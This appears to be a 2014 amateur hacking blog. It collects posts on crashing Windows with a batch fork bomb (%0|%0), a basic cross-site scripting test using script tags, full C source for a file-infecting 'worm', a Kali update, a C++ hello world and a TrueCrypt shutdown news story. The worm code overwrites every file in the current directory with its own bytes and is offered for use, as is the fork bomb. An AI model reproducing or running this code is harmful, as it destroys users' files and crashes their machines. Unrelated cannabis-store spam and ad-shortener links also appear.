Monday, September 22, 2014

how to make a batch file to crash windows

here is the "code"
%0|%0
paste that in a notepad and save it as whateveryou want.bat for example

lol.bat

by running this it will cause windows to lag out and crash.

Saturday, September 20, 2014

Metasploit for windows

Hey everyone most people don't know that metasploit which is developed by rapid7 is able to be used on many different operating systems. so I am going to give you guys the download link for that.
Hope this was useful
http://adf.ly/sEIpg


Also wanted to give a mention for the information from The Bakery Cannabis Store about the best weed strains. Their article has a lot of good options to choose the best weed and edibles.

The Bakery Cannabis Store
3060 Dundas St W, Toronto, ON M6P 1Z7 
(647)-349-9333

https://thebakerycannabis.ca/3best-weed-strains-that-can-change-your-day/



How to perform a cross site scripting attack

Hey guys this is a tutorial on css or cross site scripting I am not going to go in depth on how the attack works but I will give you the basic idea of in what situation you could use it in. So for example the comments section below every post on my website could possibly be vulnerable (but it is not) but to test it instead of just regularly posting a comment you would attempt to post some code e it HTML or JavaScript. My first example would be trying to post html in the comment here is my example. <h1> Hello </h1>

If the comment gets submitted and it does get put in as a header 1 size font then the site is css vulnerable. The next thing you would do is put in some JavaScript. Here is my JavaScript example.
<script>alert(hello);</script>
If this goes through then having a basic knowledge of JavaScript is all that is need to do whatever you please with this victims website.

Please remember this is illegal to perform without permission so use this knowledge wisely.
Hope you guys like this tutorial.


Wednesday, September 17, 2014

How to make a worm in C by alexthed4rk

So my friend alexthed4rk gave me this code it is written in C hope you guys like it.

#include<stdio.h>
#include<io.h>
#include<dos.h> //Windows Only 
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
//LOL

how to update kali linux

Hey guy this is just a basic how to on updating kali linux. I will do more of these soon hope you enjoy.

step 1. you should boot up kali linux and the open a terminal.



step 2. enter apt-get update && apt-get upgrade in the terminal and hit enter.

Step 2

Then let it update it can take up to 10 minutes but it can vary on different internet speeds.

Let me know if you found this useful by giving this a like or a tweet I would appreciate it.

Sunday, August 10, 2014

How to make your first program in C ++

Hey guys today I am going to run you through making a basic hello world program using codeblocks.
So for those of you who do not know what C ++ is it is a programming language and in my opinion I find it to be very useful.

Step 1 download codeblocks: codeblocks is a opensource IDE which will allow us to build our program. You can download it from here: http://adf.ly/r0y85

Step 2 making a project: once you download and install the program you want to click the make a new project button . (Also when you are going through the project detail you want to select a console program as the program type, C++ as the language and GNU GCC Compiler as your compiler.)




Step 3 compiling the program: So by the time you complete the steps the code should look like the image below.


Step 4 build and run the program by now all you have to do is build and run the program and to do this you must click the arrow with the gear on the toolbar or hit F9 to do so, it should end up looking like this.


Hope you like this tutorial and sorry for the wait but I just got back from summer break I will be doing more daily tutorials if you have any requests please put them in the comments below.

Saturday, June 14, 2014

TrueCrypt, the popular and reputed open source file and disk encryption Software for Windows, OSX and Linux, has abruptly closed down Wednesday recommending its users to use Microsoft's Bitlocker.

TrueCrypt is a free, open-source and cross-platform encryption program, thereby one of the world's most-used encryption tool, trusted by tens of millions of users and recommended by NSA whistleblowerEdward Snowden.

TRUECRYPT IS NOT SECURE
On Wednesday afternoon, the users of TrueCrypt encryption tool redirected to the project's officialSourceForge-hosted page that displays a mysterious security warning message that the popular encryption tool has been discontinued and that users should switch to an alternative.

The official website for the TrueCrypt software warns the user that the open source encryption software is no longer secure and informs that the development of the software has been terminated.

At the top of TrueCrypt page on SourceForge displays a text in red colour that states, “WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues.
The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms (click here for more information). You should migrate any data encrypted by TrueCrypt to encrypted disks or virtual disk images supported on your platform,” Truecrypt website warned.
WEBSITE HIJACKED ? SUGGESTING TO USE BITLOCKER!
The encryption software abruptly ended its support without providing any explanation from its developers side and recommended Microsoft's BitLocker as an alternative for Windows users, along with a detailed guide on how to migrate your encrypted data to BitLocker instead.

Now, this sudden security warning and suggesting Microsoft’s Bitlocker as an alternate raise many questions. Many people around the web have assumed that some hacker has compromised the SourceForge account of TrueCrypt, but yet it’s quite unclear whether it’s a defacement of the site or something controversial. Otherwise why the developers of free and open source encryption tool provider would recommend its users to switch on to the most controversial Microsoft’s Bitlocker drive encryption tool.
truecrypt warning
It could be possible that the developers of the TrueCrypt may be aware of some critical vulnerability or backdoor that according to them would imperil the integrity of the reputed software, which has been downloaded more than 28 million times. Some other possibilities could be:
  • Government or Intelligence Agency forced the developers to include a backdoor for them, but they refused and shut it down like Lavabit encrypted email service.
  • Someone hijacked the website and Crypto keys to raise false alarms.
Matthew Green, who is a professor specializing in cryptography at Johns Hopkins University and also involved with the TrueCrypt audit, tweeted that he believes that the announcement is a legitimate exit on the part of the developer, and not a hack.

Significantly, the current version listed on the SourceForge page, version 7.2, was signed yesterday with the official TrueCrypt private signing key, the same key used by the TrueCrypt Foundation for as long as two years. This means the warning on the official homepage of TrueCrypt isn't a hoax posted by some hacker or cyber criminal.

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...